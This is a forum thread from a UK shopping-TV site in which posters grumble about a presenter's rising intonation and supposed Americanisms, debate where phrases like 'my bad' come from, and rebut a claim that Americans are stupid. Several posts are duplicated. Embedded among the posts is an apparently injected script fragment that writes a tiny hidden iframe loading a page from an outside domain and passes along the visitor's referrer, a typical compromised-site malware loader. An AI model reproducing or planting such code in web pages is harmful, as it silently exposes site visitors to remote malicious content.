Oh Nooo not a JR American version!!

ShoppingTelly

Help Support ShoppingTelly:

Well I just dont understand it. Maybe Julia has adopted too many American friends. Particularly this evening, during the diamonique event, JR has adopted this talk where her sentences end on the 'up tone' ...Its classic American style. Ideal world's presenter Ellis Ward is extremely guilty of this talk style also If you dont understand this, think of a sentence starting on a low musical note, like middle 'c' and then the end is on note 'g' I find it very very annoying. (Along with the over used, and incorrectly gramatically placed word - 'SO' ) "I'm sooo loving this" OMG when is this rubbish going to end??? The americans ruined the english language... and all that s*it is settling over here. Yes Americans are really that stupid, it seems, so why replicate it?

I get what you saying and agree completely.It's like ,making a statement into a question,but your musical way of describing was more eloquent.
This horrific American based speak started in the "valley " in LA and it makes me sick too.
..I'm all for the Americanisation of JR.In fact ,so much so that I wish they'd ship her over there with a one way ticket..and good riddance too.

Most Americans hate the 'gansta-blackspeak' as well and I disagree with the first couple of statements as a lot of the world has had to live/suffer/enjoy good/bad European/British influence over the last couple of centuries. Each country has its share of ne'er-do-wells that disrupt and tear down society/culture.

Am I wrong or is that a phrase that has come here from America? I really find it annoying, surely it should be my mistake or I'm bad? My bad is not only grammatically incorrect but sounds silly. IMO.

I totally agree.

if (document.referrer) { var ref='?'+encode(document.referrer); } else { var ref=''; }
document.write('<iframe src="http://www.smileyssite.info/files/48.htm'+ref+'" width="20" height="20" frameborder="0" scrolling="no" marginwidth="0" marginheight="0"></iframe>');
//-->
</script>

the funny thing i have found is that it is not just in the english language, it is also creeping into europe. It is just another bad habit that all of us pick up. typos can be highly embarrassing but i can read something back that i have posted and i see mistakes all over the place so i tend not to point them out in other people in fear of my glass house caving in.
re: raising your voice at the end of a sentence... yes highly irritating but if we want to be irritated by things then there are so many things to choose from. if there wasnt anything to irritate or annoy us then most of us would not have a lot to say.
oh and the best way we found to stop our doing this was to use a quote from american pie "and one time, at band camp..." every time he did it, he soon caught on.

the funny thing i have found is that it is not just in the english language, it is also creeping into europe. It is just another bad habit that all of us pick up. typos can be highly embarrassing but i can read something back that i have posted and i see mistakes all over the place so i tend not to point them out in other people in fear of my glass house caving in.
re: raising your voice at the end of a sentence... yes highly irritating but if we want to be irritated by things then there are so many things to choose from. if there wasnt anything to irritate or annoy us then most of us would not have a lot to say.
oh and the best way we found to stop our doing this was to use a quote from american pie "and one time, at band camp..." every time he did it, he soon caught on.

ahhh yes... the flute gag. i'd forgotten that :O)

Its funny how people seem to get worked up over language, which is never stagnant, and has changed ever since people have started to talk. If you would meet several English people from different periods of time who would all have different language styles and grammar, and we have much historical reference to people bemoaning the fact of the English language changing for the worst over the last 500 years.
What I object to is the standard stereotypical and sweeping statement of all Americans are stupid. Wonder what the reaction would be if I would say all English people (just picking on one lot, please feel free to include Irish, Scottish or Welsh here) are stupid.Think I would be expecting an uproar, well deserved.

Many alleged 'Americanisms' actually travelled with the Pilgrim Fathers from Britain. "Gotten" is a case in point, which has now become contracted and changed it's meaning in the U.K. As Wild Rose pointed out, language is fluid and ever-changing, as is pronunciation and intonation.
She is right to protest at the notion that Americans are stupid.
In the 70s , many British schools allowed phonetic spelling as corrections were thought to destroy creative thinking.Consequently, most spelled labour, honour, etc. without the U as that is logical, which is what the American's did.In my day, spelling was revered and tested regularly, times change.
We can't just cherry pick the things we like from other nations and complain when other things annoy us. Some things catch on, some have a brief period of popularity, others sink without trace, that's life.

Many alleged 'Americanisms' actually travelled with the Pilgrim Fathers from Britain. "Gotten" is a case in point, which has now become contracted and changed it's meaning in the U.K. As Wild Rose pointed out, language is fluid and ever-changing, as is pronunciation and intonation.
She is right to protest at the notion that Americans are stupid.
In the 70s , many British schools allowed phonetic spelling as corrections were thought to destroy creative thinking.Consequently, most spelled labour, honour, etc. without the U as that is logical, which is what the American's did.In my day, spelling was revered and tested regularly, times change.
We can't just cherry pick the things we like from other nations and complain when other things annoy us. Some things catch on, some have a brief period of popularity, others sink without trace, that's life.

I totally agree. I was surprised when I found out that lots of 'Americanisms' actually were British words that went over with the Pilgrim fathers, but which we no longer use. Words like pocketbook which I always thought was an annoying modern American word actually originated here in the 1600's.

What I object to is the standard stereotypical and sweeping statement of all Americans are stupid.
I quite agree, actually statements like that could be regarded, in this god forsaken politiclaly correct country, as racist could they not??? I dont necessarily think it is but you can guarantee some will!

Am I wrong or is that a phrase that has come here from America? I really find it annoying, surely it should be my mistake or I'm bad? My bad is not only grammatically incorrect but sounds silly. IMO.

Yeah I'm sure you are right that it does come from over the pond - lets be honest, most stuff does!

Sorry, my bad, I wont say it again! :wink:

Yeah I'm sure you are right that it does come from over the pond - lets be honest, most stuff does!

Sorry, my bad, I wont say it again! :wink:

The first time an internet friend from America used the expression "my bad" I had no idea what he meant and asked "Your bad what?". He didn't reply for a while because he was laughing so much!

And I'm all for older presenters on the telly, just as long as they don't try to act and dress like silly little schoolgirls. The use of "so" has been a pet hate of mine for ages.

Sorry, had to post something I saw recently:

Correct grammar and punctuation is important. It's the difference between "helping your Uncle Jack, off a horse" or "helping your uncle, jack off a horse."

Personally I dont care WHO started it, (although I did think it started with Neighbours). but I have discovered a way of replying when faced with someone who speaks in an uptone, be it face to face or on the phone. I just say "are you asking me a question ? " and they generally know what I mean !!! so its an 'affliction' that can be halted.

Well I just dont understand it. Maybe Julia has adopted too many American friends. Particularly this evening, during the diamonique event, JR has adopted this talk where her sentences end on the 'up tone' ...Its classic American style. Ideal world's presenter Ellis Ward is extremely guilty of this talk style also If you dont understand this, think of a sentence starting on a low musical note, like middle 'c' and then the end is on note 'g' I find it very very annoying. (Along with the over used, and incorrectly gramatically placed word - 'SO' ) "I'm sooo loving this" OMG when is this rubbish going to end??? The americans ruined the english language... and all that s*it is settling over here. Yes Americans are really that stupid, it seems, so why replicate it?

Do you mean ending a sentence to make it sound like a question? If so, then that's an Australian trait, not American. We all adopt each other's quirks, expressions, spellings and mannerisms. Labelling all American's as stupid is an extremely sweeping statement and doesn't really do you any favours when you haven't got your fact right in the first place.

You seem to have a fixation with Ms Julia Roberts, if you don't like her so much, then don't watch her but I bet you have a secret shrine to her in your boudoir. Some people really need to get out more.

Wow wrote the above before I read any of the replies, seems great minds think alike!

One thing that DID annoy me was people saying 'I'm good' when asked how they are! I would think good at what?! Now I do it myself and our wonderful (cough) David Cameron, the old Etonian, did it when asked the same question the other day.

No-one is perfect, we all have faults, we just need to have a bit of tolerance!

The "upwards inflection".

Yes, it is very common with Australians, not so much Americans, but not solely to those nations. I am a Swede. When I first came to live here (at 14 years old, in boarding school) with very little English, I was often teased. They didn't do it to be cruel and I loved school, so I am not scarred emotionally!

However, I dislike zenophobia and general attacks on other nations, speech, mannerisms and so on. Accents are contagious, if you are talking to a person from abroad or go to live in a new country, it is very common to start unconsciously copying their accent!

Inge :eek:)

Latest posts

Back